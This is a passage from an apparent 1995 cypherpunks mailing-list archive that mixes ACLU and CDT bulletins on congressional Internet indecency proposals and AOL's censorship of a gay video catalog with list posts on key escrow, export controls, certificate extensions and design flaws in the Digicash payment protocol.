Last August, the House won widespread praise from the online community when
it adopted an amendment to encourage Internet providers to better develop
screening technologies for parents to use in controlling what their children
see in cyberspace. House Speaker Newt Gingrich went as far as to call the
Senate version of the legislation a clear "violation of free speech" and a
"violation of the right of adults to communicate with each other."

Unfortunately," said ACLU Legislative Counsel Donald Haines, "the House
members graciously accepted their applause for opposing censorship and then,
in a legislative slight of hand, turned right around and came up with their
own scheme to censor what people say and see on the Internet."

The ACLU said that it would continue to work in Congress to keep the Internet
free. "Regardless of how the bill turns out," said Haines, "both the House
and Senate need to continue to hear that their censorship is simply not
acceptable."

The House conferee's vote today removes the best chance that a
telecommunications bill will emerge without an Internet censorship provision,
the ACLU said.

"If Congress adopts either the White or Exon censorship schemes -- which
appears increasingly likely -- they will force us to turn to the Courts and
we will sue," Steinhardt said.  

More than 25 civil liberties groups, regional Internet service providers, and
commercial producers of entertainment, information, and journalism joined an
ACLU letter, delivered earlier today, that urged the conferees to reject all
proposals to impose new government censorship regulations on cyberspace and
online communications.

The ACLU said that, interestingly enough, the groups and individuals who are
eager to challenge the censorship provisions should they become law have
communicated with the ACLU via the Internet. 

Online political columnists, distributors of gay and lesbian resources, human
rights groups, academic researchers of human sexuality, AIDS education
groups, prisoners' rights groups, and student groups with controversial web
pages have all already approached the ACLU about being plaintiffs in a court
challenge. The groups said that they fear prosecution because they use online
services to post, exchange, or distribute material that could be deemed
"indecent" under the proposed law. 

-------------------------
For a copy of the coalition letter sent to the conferees, send a message to
infoaclu@aclu.org with "letter opposing White and Hyde" in the subject line.

The following organizations signed the letter:

American Civil Liberties Union
American Booksellers Foundation for Free Expression
American Communication Association
Art and Technology Society
Association of Alternative Newsweeklies
Boston Coalition for Freedom of Expression
Coalition for Academic Freedom of Expression, Carnegie Mellon University
Council of Literary Magazines and Presses
Datalytics, Inc.
Electronic Privacy Information Center
Feminists for Free Expression
Filz and Associates, Inc.
HotWired Magazine
Human Rights Watch
Justice on Campus Project
Internet Users Consortium
LitNet (The Literary Network)
Lumberyard BBS Community Network
MIT Student Association for Freedom of Expression
Media Democracy in Action Consortium (MeDIA Consortium)
National Campaign for Freedom of Expression
National Coalition Against Censorship
National Writers Union
NorthWest Feminist Anti-Censorship Taskforce
Oregon Coast Rural Information Service Cooperative
Pacific Online Access
Public Access Networks Corp. (Panix)
The Society for Human Sexuality, University of Washington
Wired Magazine

----------------------------------------------------------------
STATE PAGE (Legislation/Agency/Court Cases)
----------------------------------------------------------------
*     AOL Censors Gay Video Titles, Finds "Buns" Acceptable but "Studs" Too
Sleazy

AOL customers won't be surprised to hear that the AOL censors are at it
again.  AOL has long had a policy of screening certain "dirty words" from its
public bulletin boards and chat groups.  Last week, The Boston Globe reported
that AOL had banned the word "breast."  The company agreed to reverse the
policy after "several days of on-line protests by irate breast cancer
patients."  Richard A. Knox, "Women Go Online To Decry Ban On  Breast,'" The
Boston Globe, 12/1/95.

Another example of AOL's attempt to use censorship to create a
"family-friendly" service was recently brought to the ACLU's attention.

Jeff Satkin is owner and operator of ATKOL Gay Videos, a mail-order gay video
store headquartered in Plainfield, NJ.  Last August, Jeff responded to AOL's
bid for new business by signing up as an advertiser on "Downtown AOL" (DT
AOL).  AOL describes the site as "a virtual small business community where
potential customers will come to browse and shop for products and services of
all types."  Jeff paid the advertising fee and sent AOL an electronic copy of
his extensive mail-order video catalog for posting on the DT AOL site.  Under
the contract, AOL agreed to run the ad for a term of one year. According to
Jeff, AOL posted the catalog in full for four weeks with no complaints.

Then, in September, AOL sent Jeff a letter requesting that a huge percentage
of titles in the ATKOL Video mail-order catalog be removed from the online
version of the catalog that appeared on Downtown AOL.  An AOL employee had
gone through a printed version of the list and highlighted the offending
titles that would need to be removed.   The result is a hilarious but
frightening example of arbitrary censorship.

At the ACLU's suggestion, Jeff wrote to AOL and asked them to explain the
guidelines they used for censoring his catalog.  After considerable delay,
AOL wrote back the following:

"DT AOL does not have any written standards for its advertisements.  As the
manager of the area I determine whether an advertisement has the look and
feel that best fits our environment.  I edited the file you sent and removed
any titles which I felt didn't reflect the image we would like to project.  I
may have missed a few as you pointed out, so feel free to remove those as
well if you would like."

Here are just a few examples of AOL's arbitrary rating system as applied to
the ATKOL Video catalog.  (And remember, these are **titles only**!! -- no
pictures, no cover art, no narrative -- just titles.)

AOL Says                        AOL Says
"Thumbs Down" --                "Thumbs Up" --

These titles were censored as   These titles were not censored --
too sleazy for AOL!:            they must have had "the look and
                                feel that best fits the AOL environment":

A Brother's Desire              A Family Affair
Advanced Disrobics              Lockerroom Fever
All About Sex                   ABC's of Sex
All the Right Stuff             All Men Do It!
As the Bed Turns                Bed Tales
Bare Bones                      Bareback
Bedroom Eyes                    Bedroom Lies
Bi  N Large                     Bi-Conflict
The Big Nasty                   The Big Drill
Bigger Than Huge                Bigger Than Life
Black Magic                     Magic Choices
Black Dudes                     Blond Lovers
The Boy Next Door               Boys from New Jersey
Brotherly Love                  Brother Trouble
Buns  N Hoses                   Bung Hole Buddies
Dirty Pictures                  Dirty Picture Show
Elements of Passion             Passion By Fire
Everybody Does It               Every Which Way
Filth                           Dirty Laundry
Gayracula                       Gay Tarzan
Hot Lunch                       Hot Stuff
Latin on the Loose              Latin Lust
Leather Angel                   Leather Report
Man in Motion                   The Man Inside
Men in Shorts                   Men with Tools
Night Maneuvers                 Nights in Black Leather
Power Grip                      Power Trip
 Rican Christmas                Latino Nights
The Rites of Spring             The Rites of Summer
Skin Deep                       Skin Tight
Spring Semester                 Spring Break
Sunday Brunch                   Summer Heat
Tough and Tender                Tough Iron
White Trash                     White on White
Wild Dreams                     Wild Thing
You Are Not Alone               Alone and Private

Titles with any of the following words, regardless of the full title, were
also censored:  "pleasure," "black," "hard," "boys," "jock," "Rican," "sex,"
"stud," "straight," "young."

A few more interesting facts about the case should be noted.  First, while
AOL has never publicized the list of "vulgar" words that it routinely screens
from its public sites, most of the screened words are classic profanity and
"dirty words."  None of the titles that AOL censored from ATKOL Video's list
contain those "dirty" words.  Second, it is clear that AOL's action was an
overreaction to the recent federal law enforcement raids on alleged child
pornographers using AOL -- Jeff received the letter shortly after the raids
made the headlines.  But *none* of Jeff's videos contain child porn.  And
again -- the info in the catalog was *titles only* and contained no
substantive material at all.

Third, it appears that AOL's arbitrary standards may be a little homophobic.
 While "Wet and Wild" was an unacceptable title in a gay video catalog, AOL
ran an ad in Downtown AOL for Affinity Teleproductions, Inc. that read: "Now
you can join exotic Anna Nicole Smith on her sensuous Edenquest adventure in
her exclusive photo portfolio. . . .  Anna Nicole Smith "The Collectors Set"
features ten eye opening Edenquest photographs in vivid color . . . .  It's
all Anna Nicole Smith wet and wild drenched in sun and powder sugar sand.
 "With Love, Anna Nicole" is your personal trip to paradise with the world's
most exciting woman in her most provocative photos ever."

The troubles experienced by ATKOL Video when it legitimately tried to do
business with AOL just proves once again that censorship rules are by nature
arbitrary and unfair -- whether imposed by the government or by private
industry.

----------------------------------------------------------------
ACLU Speaks on Cyber-Liberties
----------------------------------------------------------------
12/5/95     Nadine Strossen, President of the ACLU, debated Kathy Cleaver of
the American Family Research Council over online censorship proposals on
CNN's "Crossfire."

12/5/95    Barry Steinhardt, Associate Director of the ACLU, debated Bob
Peters of Morality and Media over online censorship proposals on CBS Radio
Network's Gil Gross Show.

12/7/95     Ann Beeson, ACLU cyberspace policy analyst, speaks on a panel at
the Walker Art Center in Minneapolis, Minnesota.  "Art on the Internet:
Power, Access and Desire," 7:30 p.m.  See http://bowlingalley.walkerart.org/.

Next week:   Watch the CNBC 6:00 pm news for an interview with Barry
Steinhardt on Congress' proposals to censor the net.

----------------------------------------------------------------
ONLINE RESOURCES FROM THE ACLU NATIONAL OFFICE
----------------------------------------------------------------
Stay tuned for news on the ACLU's world wide web site, under construction at
http://www.aclu.org.  America Online users should check out our live chats,
auditorium events, *very* active message boards, and complete news on civil
liberties, at keyword ACLU.

----------------------------------------------------------------
ACLU Cyber-Liberties Update
Editor: Ann Beeson (beeson@aclu.org)
American Civil Liberties Union National Office
132 West 43rd Street
New York, New York 10036

To subscribe to the ACLU Cyber-Liberties Update, send a message to
infoaclu@aclu.org with "subscribe Cyber-Liberties Update" in the subject line
of your message.  To terminate your subscription, send a message to
infoaclu@aclu.org with "unsubscribe Cyber-Liberties Update" in the subject
line.

For general information about the ACLU, write to infoaclu@aclu.org.
----------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an116512@anon.penet.fi
Date: Wed, 6 Dec 95 09:11:01 PST
To: cypherpunks@toad.com
Subject: Re: Netscape Bug Bounty...
Message-ID: <9512061707.AA12269@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


In .cypherpunks, Jeff Weinstein <jsw@netscape.com> writes:
>  FYI, since both the bounty and the particular bug have been discussed
>here...
>
free advert.
>  We are awarding Scott Weston $1000 for reporting the LiveScript history
>problem.  The announcement should show up on our Bug Bounty winner's
>page by tomorrow.
>

hey, that'll make a real dent in the stock price (hint: three letters,
1st is s, 2nd is e, 3rd is c).

>	--Jeff
>
>Jeff Weinstein - Electronic Munitions Specialist
why don't you at least try to be original, asshole?
>Netscape Communication Corporation
>jsw@netscape.com - http://home.netscape.com/people/jsw
>Any opinions expressed above are mine.
mostly yours, at least (except for the original parts).
thief.
>
>
--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 6 Dec 95 17:19:21 PST
To: cypherpunks@toad.com
Subject: Re: Why Netscape employees should not leave
In-Reply-To: <199512040002.AA08103@ideath.goldenbear.com>
Message-ID: <30C64034.6323@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack wrote:
>         This leaves us to ask, why GAK is such a big deal at NIST, if
> CKE will get them most of what they want?  First, they haven't
> realized that CKE is most of what they want.  Second, they're worried
> about the extra 10%.  Drug dealers and terrorists not using it.  (This
> points towords an eventual mandate for GAK, even if it starts out
> voluntary.  Many have noted this.)  Third, they've invested so much
> energy in the fight for GAK that they're emotionally tied to the idea,
> and they can't say 'well this would be almost as good.'

  It also allows them to stall on increasing the clearly inadequate
export key size of 40-bit, while they are working on "an alternate
solution".  Given the overwelming negative response from industry
over GAK, it may be nothing other than a delaying action.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 6 Dec 95 17:39:18 PST
To: cypherpunks@toad.com
Subject: Re: News on Congressional Debate on Exon
In-Reply-To: <9512062040.AA20810@toad.com>
Message-ID: <30C644E3.72CE@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Peter Trei wrote:
> Actually, I've been thinking about this quite a bit recently. I'm building
> an SSL enabled server, and clent-side authentication may provide
> some help. I could see a user getting his or her public key certificate
> signed with different CA keys which assert any number of conditions,
> such as:
> 
> Key holder was born before (some particular date).
> Key holder has access to sales data for XYZ corp.
> Key holder is an adult who takes the first amendment seriously.
> 
> ... and the server would recognize different CA signatures as permitting
> different levels of access.

  This can be done with x509v3 certificate extensions.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 6 Dec 95 14:59:41 PST
To: Ernest Hua <hua@chromatic.com>
Subject: Re: The "Future" Fallacy
In-Reply-To: <9512061801.AA07656@krypton.chromatic.com>
Message-ID: <Pine.SUN.3.91.951206175944.16692D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 6 Dec 1995, Ernest Hua wrote:

> >
> > I think Duncan was mad at the 'soon.'  Why not today?
> 
> I think I can answer this question because I was an obnoxious little
> hacker with an Atari 800 when I was a kid.  The only thing I did not
> have was a modem and an Internet connection (thus ability to read
> sci.crypt.research etc ...)

[...]

> means, a super-smart person.  Therefore, it is not a stretch to
> believe that kids today can perform powerful encryption in the
> privacy of their own homes.

Not a stretch?  I'd say it was proven fact two years ago.  This, I 
believe, was Duncan's point.

[...]

> Ern
> 
> 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@guaymas.CS.Berkeley.EDU (David A Wagner)
Date: Wed, 6 Dec 95 15:02:28 PST
To: cypherpunks@toad.com
Subject: Still more on the Digicash protocol
Message-ID: <199512062301.SAA15714@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Ian & I were talking about the Digicash protocol some more.

Hal has pointed out that payments & deposits with a wildcard in the
payment_hdr should NOT be sent in the clear, since they can be stolen
by any passive eavesdropper.

Ian has pointed out the same problem with cancellations: the payer_code
should NOT be sent in the clear, since any passive eavesdropper can
grab this info and steal the corresponding payment.

Sadly, the current Digicash client DOES send those items in the clear
(without even warning users to avoid wildcards).  Why?


Anyhow, the obvious solution is encryption.  Our new observation is
that encrypting deposits & cancellations with the mint's public key
is not enough to solve the problem.

To see this, recall how the public key encryption works: a session
key for a bulk cipher is encrypted under the public key, and the data
(e.g. userhdr, payment_hdr, coins, ...) is encrypted under the bulk
cipher.  Digicash hasn't told us yet what bulk cipher they use, but
let's assume for concreteness they use RC4.

Now I'm an attacker -- I want to modify userhdr.userID -- and then
the mint will accept the payment and deposit the coins into the wrong
account.  But this is just easy for an active attacker -- I just flip
bits in the ciphertext!  (Presumably I can guess fairly well what
plaintext value is expected for the userhdr.userID field.)

This is just a corollary of my Pet Peeve for protocol designers:

	Don't use encryption when you want message authentication;
	with encryption, you should only count on confidentiality!

Ok, so you mention that maybe Digicash uses DES-CBC or somesuch instead
of a stream cipher like RC4.  I'll briefly note that while the attack
isn't so trivial anymore, DES-CBC ciphertext is not tamper-proof -- again,
encryption does not provide message authentication.


Another nitpick from your friendly neighborhood techno-geek.  I noticed
that signatures (when used) don't cover the headers.  Since the mint uses
header information to make important decisions (e.g. the userhdr.userID
field specifies who's account a deposit should go to), shouldn't this be
signed, just as a matter of ordinary everyday paranoia?


While I'm ranting, let me also remind you of a problem Ian discovered
earlier through reverse-engineering: the payment & deposit messages aren't
encrypted, and they send
	payee (e.g. shop) identity
	payer's and payee's banks
	payer's currency-of-choice
	amount of money transferred
	description of the product
	time of payment
in the clear, accessible to any passive eavesdropper.

With traffic analysis, if payers use the default TCP connection, all
this information about them can be compiled.  If I target a payer, I'll
probably be able to record all his transactions (unless he's using
remailers or pipenet).  If I sit outside a small business, I can compile
a dossier on its buying habits.

Worse still, anonymity for the shop is worse with Digicash than with real
cash.  If I pay you real cash on a secluded street, you're fairly anonymous.
If I pay you Digicash over the Internet, any passive eavesdropper could be
recording your identy and the whole transaction.  Blech.

So Digicash's product does all sorts of neat crypto to provide you with
anonymity from the bank, but doesn't do much to provide anonymity from
eavesdroppers on the Internet.

This is exactly backwards from how I'd prioritize -- I'll trust my bank
to keep me private long before I'll trust messages sent in the clear
over the Internet (on a virtual postcard) for all to see!  Blech.


So, what should Digicash be doing to remedy these problems?

* always set up an encrypted, authenticated connection before sending
  any messages in the Digicash protocol.

  (Yes, this means shops will need to have certificates if you want
  to avoid a man-in-the-middle attack.  So be it.  Most online shops
  will be using SSL, and thus have a certificate anyhow.  You can safely
  punt on the authentication between customer <-> shop if you're not
  worried about active attacks.)

* add a big warning to the documentation: users should not use wildcards
  in payments (unless they know the dangers & are encrypting with e.g. PGP).

* sign the header stuff too.

* continue specifying the protocol at a deeper level, like you promised
  (and throw in source for security-critical modules too, eh? :-)
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMMYgtioZzwIn1bdtAQHx9QF+J6qWEqWcsaoVOUQ3i9qaVF8MgYdztCLg
9si9YDnjqPnFEsGTHYBjZXB8/TpOfiZe
=cBGu
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 6 Dec 95 15:08:38 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Untraceability in Mobile Networks
In-Reply-To: <9512060854.AA12541@supra.comm.mot.com>
Message-ID: <199512062309.SAA16230@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Loren J. Rittle writes:
> FYI, at MobiCom '95, an ACM sponsored conference, an interesting paper
> entitled, _Untraceability in Mobile Networks_, was presented.  The
> authors of the paper are Didier Samfat, Refik Molva and N. Asokan.

The same authors presented papers on similar themes at MCSA `94 (Workshop on
Mobile Computing Systems and Applications). See 
<a href="http://snapple.cs.washington.edu/mobile/mcsa94.html>the MCSA `94
home page</a>, which has links to PostScript versions of the papers. They
even had a panel on "Privacy & Anonymity", apparently !

The relevant papers are:

Anonymity in a Mobile Computing Environment 
     N. Asokan - University of Waterloo.

A Method Providing Identity Privacy to Mobile Users during Authentication 
     Didier Samfat and Refik Molva - Institut Eurecom.

On Travelling Incognito 
     A. Herzberg, H. Krawczyk - IBM T.J. Watson, and G. Tsudik - IBM Zurich. 

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 6 Dec 95 15:18:39 PST
To: cypherpunks@toad.com
Subject: Re: latest librand source now av
In-Reply-To: <9512062243.AA04215@anon.penet.fi>
Message-ID: <199512062319.SAA13164@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



an116512@anon.penet.fi (Shithead) writes:
> In .cypherpunks, Matt Blaze <mab@research.att.com> writes:
> >Souce code for the latest version of librand (a random
> >number package based on event interval variations) for
> >Unix-like machines is now available in:
> >  ftp://ftp.research.att.com/dist/mab/librand.shar
> 
> why the FUCK would anyone want to use random number code from at&t,
> (and mister nescape GAK apologist himself)? this the code that was
> broken by french student for christs sakes.

What drugs, exactly, have you been taking, and where can we buy them?
They are obviously very good, although it appears that you are getting
a bit of a paranoid edge from them.

(For those not in the know...

1) Matt Blaze is the guy that, among other things, embarassed the NSA
   with his discovery of flaws in Tessera, which made the front page
   of the times.
2) His code has nothing to do with Netscape, and neither does he.)

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Wed, 6 Dec 95 16:28:06 PST
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Solution for US/Foreign Software?
In-Reply-To: <199512062336.PAA13979@ix6.ix.netcom.com>
Message-ID: <9512070028.AA01359@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Bill Stewart writes:
 > I had interpreted the suggestion differently - rather than a system with 
 > user-accessible crypto hooks, the manufacturer could ship a binary patch
 > upgrade for US customers to install.  The internal design would presumably
 > have crypto hooks (i.e. subroutine calls); they can't ban that.

No, they can't *ban* it, but there's no reason to suspect that they
won't revoke the export license after the scheme becomes clear.  And
of course the patch itself would not be exportable.  If there's a
"wink wink nudge nudge" implication that the patch would make its way
overseas, I don't understand why that's really any more likely than
the US-only version getting out.

Note that the USGov puts definite explicit heat on corporations to
make it clear that they're serious about this stuff.  The responsible
VP for such things at one company with which I'm familiar was
explicitly reminded that he could personally be held criminally liable
for any transgressions of the export laws.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Wed, 6 Dec 95 15:45:35 PST
To: tcmay@got.net
Subject: Re: News on Congressional Debate on Exon
Message-ID: <01HYHWSWQVWG9S3RQJ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	The following are from NandO.net, CDT, and EFF respectively. Sorry
about the lack of editing, but I'm having editor problems. I don't know what
the "fused" bill looks like. The White one can be gotten around through tactics
such as daemons deleting "adults only" signifiers when passing through one's
(or a virally-infected) machine, or via the offshore (unfiltered) server idea.
Otherwise, everything that Congress doesn't like may wind up being accessible
only via identification.
	If it's more like the Exon & Hyde one, then we've got real problems.
That one is broad enough to be probably tossed out by the courts (or by
Clinton if he ever shows the guts).
	-Allen

  __________________________________________________________________________

      (c) 1995 Copyright Nando.net
      (c) 1995 Associated Press
      
   
   
   WASHINGTON (Dec 6, 1995 - 16:57 EST) -- House lawmakers agreed
   Wednesday on a plan that would make it illegal for a company to
   knowingly transmit sexually explicit and other "indecent" material to
   minors over computers.
   
   The agreement makes it all but certain that if legislation overhauling
   the nation's telecommunications laws is enacted, it will contain some
   of the most sweeping anti-smut provisions ever imposed on computer
   communications.
   
   The plan is part of negotiations on a larger telecommunications bill
   and settles differences among House members who were deeply divided
   over how to best limit children's exposure to smut carried on computer
   services, including the global network, Internet.
   
   The plan not only toughens an anti-smut provision contained in a a
   House telecommunications bill, but brings it in line with a provision
   in the Senate's telecommunications bill.
   
   "We're on the road to an agreement that most can agree to," said Sen.
   J. James Exon, D-Neb., author of Senate's anti-smut provision, which
   like the House plan also outlaws the transmission of indecent material
   to minors.
   
   House and Senate lawmakers serving on a committee to reconcile House-
   and Senate-passed telecommunications bills met for the second time in
   six weeks on Wednesday.
   
   "I'm determined to finish this bill," said Sen. Larry Pressler,
   R-S.D., architect of the Senate's telecommunications measure and
   chairman of the conference committee.
   
   Supporters are scrambling to bring a final bill to each chamber for a
   vote by Dec. 15. Rep. Thomas Bliley, R-Va., the primary author of the
   House bill, said the conference could be completed "within days."
   
   While the panel ended up reconciling nearly three dozen largely
   non-controversial provisions contained in both bills, it has yet to
   resolve differences on the most contentious issues -- the conditions
   by which Bell companies may enter the long-distance business and media
   ownership.
   
   A tentative agreement on another contentious issue -- cable
   deregulation -- would lift existing price regulations on all but the
   smallest cable TV systems in at least three years. Small systems would
   be deregulated upon enactment.
   
   The House's anti-smut plan -- a combination of dueling proposals from
   Rep. Rick White, R-Wash., and Henry Hyde, R-Ill., would prohibit
   content providers on a computer service from "knowingly sending or
   directly sending" sexually explicit material to anyone 18 years old
   and younger.
   
   Companies that provide access to computer networks, like America
   Online and CompuServe, would not be liable under the provision, White
   said.
   
   The Department of Justice would enforce the provision, which also
   carries criminal penalties of up to two years in jail and $100,000 in
   fines.
   
   Businesses and civil liberties groups opposed Hyde's plan to toughen
   the House's anti-smut provision by making it illegal for a content
   provider to knowingly transmit indecent materials.
   
   Instead, they had rallied behind a proposal from White, whose district
   includes the headquarters of Microsoft, that among other things, would
   have prohibited only the transmission of materials "harmful to minors"
   and would not have outlawed indecent transmissions.
   
   The Center for Democracy and Technology Policy, one of the main groups
   pushing for weaker anti-smut provisions, had no immediate comment on
   the House plan.
   
   But Mike Russell, a spokesman for the Christian Coalition, which
   backed Hyde's tougher standard, said: "It is clearly going in our
   direction. We were holding out for tougher language and it appears
   we're going to get it."
   
   Indecent speech, unlike obscenity, is protected under the First
   Amendment. Though the House plan doesn't yet specifically define
   "indecent," the standard legal and regulatory definition says it is
   material that describes in terms patently offensive, as measured by
   contemporary community standard, sexual or excretory activities or
   organ.
   
   Transmission of obscene materials whether by print, broadcast, cable
   or computers is illegal. Obscenity is something that, measured by
   community standards, lacks, among other things serious artistic,
   political or scientific or social merit.
   
   


------------------------------------------------------------------------
   ******   ********   **************
  ********  *********  **************
  **        **      **      ***               POLICY POST
  **        **      **      ***
  **        **      **      ***               December 4, 1995
  **        **      **      ***               Number 31
  ********  *********       ***
   ******   ********        ***
------------------------------------------------------------------------
  A briefing on public policy issues affecting civil liberties online
------------------------------------------------------------------------
CDT POLICY POST Number 31                      December 4, 1995

CONTENTS: (1) House Conferees to Vote Wednesday on Fate of Net
          (2) How To Subscribe To The CDT Policy Post Distribution List
          (3) About CDT, Contacting Us

This document may be re-distributed freely provided it remains in its
entirety. Excerpts may be re-posted by permission (editor@cdt.org)
------------------------------------------------------------------------
-

(1) HOUSE CONFEREES TO VOTE WEDNESDAY ON FATE OF THE NET

On Wednesday December 6, members of the House conference committee will
vote on how to deal with the controversial "cyberporn" issue. The full
House/Senate conference committee will consider the issue within the
next two weeks.

After months of contentious debate, the conferees must now choose
between two proposals: one proposal sponsored by Representative Henry
Hyde (R-IL) and an alternative proposed by Rep. Rick White (R-WA).  The
Hyde proposal would severely restrict freedom of speech on the Internet,
and grant the Federal Communications Commission new authority to
regulate online content. The White proposal relies on parents, not
federal bureaucrats, to determine what material is and is not
appropriate for themselves and their children, though it also imposes
new criminal penalties for individuals who transmit material that is
"harmful to minors".

The outcome of this decision will have tremendous implications on the
future of freedom of expression and the development of interactive media
as a whole. If the Hyde proposal prevails, the Internet as we know it
will never be the same.

CDT firmly believes that no new laws in this area are necessary. Current
law is already working to punish online stalkers and prosecute the
distribution of obscene material online. However, choosing nothing is
not an option available to the Conference Committee. Given the options
before the committee, CDT believes that the effort of Congressman White
should be commended. He has tried to find a resolution to this issue
which preserves freedom of speech and relies on user empowerment over
government control of online content. Rep. White's proposal represents
the only option on the table which will not destroy the Internet and the
future of interactive communications technologies. Although this is a
difficult choice for the Net.Community, White must prevail at this
stage.

The Hyde proposal, which is being pushed heavily by the Christian
Coalition, would severely restrict freedom of speech and the democratic
potential of the Internet and other interactive media. It fails to
recognize the global, decentralized nature of interactive media and its
tremendous ability for user control. The proposal would be wholly
ineffective at accomplishing its stated objective of protecting children
from objectionable material, while destroying the Internet in the
process.

If the conferees choose Hyde's approach over White, the Federal
Communications Commission will, for the first time ever, have the
authority to regulate online content and the underlying technologies of
the net itself. In addition, the First Amendment and the free flow of
information online will be chilled by an overly broad "indecency"
standard. Online service providers will be forced to monitor all traffic
to ensure that no "indecent" material is transmitted (creating a
nightmare for freedom of speech and privacy), or shut down some service
all together for fear of expensive law suits or prison sentences. And
although all these provisions can be challenged in court, recent history
with the so-called "dial-a-porn" and indecency an cable channels
(Alliance for Community Media vs. FCC) suggest that such challenges can
take years to resolve, and even then with no guarantee of success.

Representative White's approach seeks to protect cyberspace from
intrusion by the federal government, and to empower parents to make
decisions about what is and is not appropriate for themselves and for
their children. While the proposal does contain new criminal provisions,
including restrictions on the display of material that is "harmful to
minors", it also creates a defense to prosecution for those who take
good faith, reasonable efforts to label content and enable others to
block it using user control technologies.

The fate of the Net, and the future of freedom of speech and the
democratic potential of interactive media, now rests in the hands of the
conference committee members.

OVERVIEW OF THE HYDE AND WHITE PROPOSALS

I.  THE HYDE PROPOSAL

Representative Hyde is pushing an unconstitutional and overly regulatory
proposal which would criminalize the transmission and display of
"indecent material" (a broad classification which includes everything
from the so-called '7 dirty words' to classic works of fiction such as
The Catcher In the Rye and Ulysses), hold carriers liable for material
created by their subscribers, and grant the Federal Government broad new
authority over online content and the underlying technologies of the
Internet. The Hyde proposal has been endorsed by the Christian Coalition
and other members of the "religious-right".

Among other things, the Hyde proposal would:

1. Create $100,000 fines and 2 year jail terms for anyone who makes or
   makes available any indecent material to a minor (Sec 402 (d)).

2. Grant the FCC broad authority over on line speech and over online
   technology (Sec (e)(1))

3. Criminalize the transmission or display of indecent material to
   anyone under 18 years of age (Amendment to 18 USC 1465),

4. Not pre-empt state from passing even more restrictive, or even
   inconsistent, regulations.

See CDT Policy Post No. 30 (December 1, 1995) for a detailed description
of the Hyde proposal. For more information, including the text of the
Hyde proposal and other relevant documents, visit CDT's net-censorship
issues page (http://www.cdt.org/cda.html)

II.  THE WHITE PROPOSAL

The proposal offered by Representative White, an original co-sponsor of
the Cox/Wyden/White "Internet Freedom and Family Empowerment" Amendment,
is based on the user empowerment aspects of the original Cox/Wyden/White
amendment.

The White proposal substitutes the narrower "harmful to minors" standard
for "indecency", and prohibits the FCC from imposing content regulations
on online speech and from meddling in the underlying technologies of the
Internet.  While the White proposal does prohibit the "display" of
material that is harmful to minors online, it creates a defense for
those who take good faith, reasonable steps, to labile content and
enable users to block or objectionable material using user control
technologies (such as SurfWatch, the Parental Control features of AOL or
Prodigy, or the PICS standards being developed by MIT and the World Wide
Web Consortium).

Briefly, the White proposal would:

1. Prohibit intentionally sending material that is harmful to minors
   directly to a to someone the sender knows is a minor,

2. Prohibit the display of material that is harmful to minors. However,
   content providers (including individual users) would be immune to
   prosecution if they have taken good faith, reasonable efforts to
   labile their content and enable it to be blocked or filtered by
others
   (The MIT/World Wide Web consortium's PICS would be one example),

3. Prohibit the FCC from regulating content on or the technologies of
   the Internet and other interactive media,

4. Pre-empt inconsistent state laws, although this provision would not
   apply to individuals, non-profit providers of interactive computer
   services (such as BBS's or freenets), or non-profit organizations.

5. Clarify the House-passed Cox/Wyden/White to ensure that it does
   inadvertently create loopholes in ECPA or other privacy laws,

